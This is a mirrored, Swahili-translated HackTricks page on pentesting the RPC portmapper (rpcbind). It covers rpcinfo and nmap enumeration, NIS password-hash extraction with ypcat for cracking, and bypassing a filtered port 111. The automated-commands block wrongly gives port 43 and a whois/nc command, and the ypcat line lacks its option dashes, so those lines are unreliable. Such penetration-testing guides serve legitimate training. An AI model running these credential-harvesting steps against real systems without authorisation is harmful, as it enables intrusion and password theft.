Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-27 07:01:09 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-rpcbind.md
Translator workflow 54a7bb5de7 Translated to Swahili
2024-02-11 02:13:58 +00:00

140 lines
8.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 111/TCP/UDP - Uchunguzi wa Portmapper
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
**Portmapper** ni huduma inayotumiwa kwa kufanya ramani ya bandari za huduma za mtandao kwa nambari za programu za **RPC** (Remote Procedure Call). Inafanya kazi kama sehemu muhimu katika **mifumo ya Unix**, ikirahisisha kubadilishana habari kati ya mifumo hii. **Port** inayohusiana na **Portmapper** mara nyingi huchunguzwa na wadukuzi kwani inaweza kufichua habari muhimu. Habari hii ni pamoja na aina ya **Mfumo wa Uendeshaji wa Unix (OS)** unaotumika na maelezo kuhusu huduma zinazopatikana kwenye mfumo. Zaidi ya hayo, **Portmapper** mara nyingi hutumiwa pamoja na **NFS (Network File System)**, **NIS (Network Information Service)**, na huduma zingine za msingi wa **RPC** ili kusimamia huduma za mtandao kwa ufanisi.
**Port ya chaguo-msingi:** 111/TCP/UDP, 32771 kwenye Oracle Solaris
```
PORT STATE SERVICE
111/tcp open rpcbind
```
## Uchambuzi
RPCBind ni huduma ya mtandao inayotumiwa kwenye mifumo ya Unix na Linux kusajili na kusimamia huduma za RPC (Remote Procedure Call). RPCBind inasikiliza kwenye bandari 111 na inaruhusu wateja kuuliza orodha ya huduma zinazopatikana kwenye mfumo.
Kwa kuanza uchambuzi wa RPCBind, unaweza kutumia amri ifuatayo:
```plaintext
rpcinfo -p <target>
```
Amri hii itakupa orodha ya huduma zinazopatikana kwenye mfumo huo. Unaweza kutumia habari hii kwa uchambuzi zaidi na kugundua mianya ya usalama ambayo inaweza kutumiwa kwa kuingilia kati au kushambulia mfumo.
```
rpcinfo irked.htb
nmap -sSUC -p111 192.168.10.1
```
Kuna nyakati ambapo haitoi habari yoyote, katika nyakati nyingine utapata kitu kama hiki:
![](<../.gitbook/assets/image (230).png>)
### Shodan
* `port:111 portmap`
## RPCBind + NFS
Ikiwa utapata huduma ya NFS basi labda utaweza kuorodhesha na kupakua (na labda kupakia) faili:
![](<../.gitbook/assets/image (232).png>)
Soma [2049 - Pentesting Huduma ya NFS](nfs-service-pentesting.md) ili kujifunza zaidi juu ya jinsi ya kujaribu itifaki hii.
## NIS
Kuchunguza udhaifu wa **NIS** inahusisha mchakato wa hatua mbili, ukitangulia kwa kutambua huduma ya `ypbind`. Msingi wa uchunguzi huu ni kugundua **jina la kikoa cha NIS**, bila ambayo maendeleo yanakwama.
![](<../.gitbook/assets/image (233).png>)
Safari ya uchunguzi inaanza na usakinishaji wa pakiti muhimu (`apt-get install nis`). Hatua inayofuata inahitaji kutumia `ypwhich` kuthibitisha uwepo wa seva ya NIS kwa kuitumia jina la kikoa na anwani ya IP ya seva, kuhakikisha kuwa vipengele hivi vimefichwa kwa usalama.
Hatua ya mwisho na muhimu inahusisha amri ya `ypcat` kuondoa data nyeti, haswa nywila zilizofichwa za watumiaji. Hash hizi, mara zinapovunjwa kwa kutumia zana kama **John the Ripper**, zinafunua ufahamu juu ya ufikiaji na mamlaka ya mfumo.
```bash
# Install NIS tools
apt-get install nis
# Ping the NIS server to confirm its presence
ypwhich -d <domain-name> <server-ip>
# Extract user credentials
ypcat d <domain-name> h <server-ip> passwd.byname
```
### Faili za NIF
| **Faili Kuu** | **Ramani(s)** | **Maelezo** |
| ---------------- | --------------------------- | --------------------------------- |
| /etc/hosts | hosts.byname, hosts.byaddr | Ina jina la mwenyeji na maelezo ya IP |
| /etc/passwd | passwd.byname, passwd.byuid | Faili ya nenosiri ya mtumiaji wa NIS |
| /etc/group | group.byname, group.bygid | Faili ya kikundi cha NIS |
| /usr/lib/aliases | mail.aliases | Maelezo ya anwani za barua pepe |
## Watumiaji wa RPC
Ikiwa unapata huduma ya **rusersd** iliyoorodheshwa kama hii:
![](<../.gitbook/assets/image (231).png>)
Unaweza kuchunguza watumiaji wa sanduku. Ili kujifunza jinsi ya kufanya hivyo, soma [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md).
## Kuepuka Kichujio cha Bandari ya Portmapper
Wakati unafanya **nmap scan** na kugundua bandari za NFS zilizofunguliwa na bandari 111 zikiwa zimechujwa, kuambukiza moja kwa moja bandari hizi sio rahisi. Walakini, kwa **kuiga huduma ya portmapper kwenye kompyuta yako na kuunda handaki kutoka kwenye kompyuta yako** kwenda kwenye lengo, kuambukiza kunawezekana kwa kutumia zana za kawaida. Mbinu hii inaruhusu kuepuka hali iliyochujwa ya bandari 111, hivyo kuruhusu ufikiaji wa huduma za NFS. Kwa mwongozo wa kina juu ya mbinu hii, tazama makala inayopatikana kwenye [kiunga hiki](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc).
## Shodan
* `Portmap`
## Maabara za Mazoezi
* Fanya mazoezi ya mbinu hizi kwenye [**Mfumo wa Irked HTB**](https://app.hackthebox.com/machines/Irked).
## Amri za Kiotomatiki za HackTricks
```
Protocol_Name: Portmapper #Protocol Abbreviation if there is one.
Port_Number: 43 #Comma separated if there is more than one.
Protocol_Description: PM or RPCBind #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for PortMapper
Note: |
Portmapper is a service that is utilized for mapping network service ports to RPC (Remote Procedure Call) program numbers. It acts as a critical component in Unix-based systems, facilitating the exchange of information between these systems. The port associated with Portmapper is frequently scanned by attackers as it can reveal valuable information. This information includes the type of Unix Operating System (OS) running and details about the services that are available on the system. Additionally, Portmapper is commonly used in conjunction with NFS (Network File System), NIS (Network Information Service), and other RPC-based services to manage network services effectively.
https://book.hacktricks.xyz/pentesting/pentesting-rpcbind
Entry_2:
Name: rpc info
Description: May give netstat-type info
Command: whois -h {IP} -p 43 {Domain_Name} && echo {Domain_Name} | nc -vn {IP} 43
Entry_3:
Name: nmap
Description: May give netstat-type info
Command: nmap -sSUC -p 111 {IP}
```
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
Reference in a new issue View git blame Copy permalink